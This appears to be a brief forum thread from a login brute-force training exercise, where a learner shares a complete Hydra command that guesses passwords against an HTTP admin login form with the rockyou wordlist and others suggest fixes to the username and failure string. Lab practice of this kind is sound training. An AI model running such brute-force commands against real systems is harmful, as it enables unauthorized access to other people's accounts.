Login Bruteforce assessment: website

hydra -l admin -P /usr/share/wordlists/rockyou.txt -u -f -s 30529 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=" -t 4 -I
I have been using this command. Can anybody help me?

Look at the hint. It says: "You may reuse the username you found earlier."
And the parameter -t 4 is too slow for the HTTP form; it is appropriate for SSH brute force, so as not to saturate it.
The difficulty in the exercise is to find the correct wordlist.

So change to hydra -l user …

But do you also adapt here: /admin_login.php:user=user


Also I include :F=<form name='login', but whatever I tried, I get false positives.
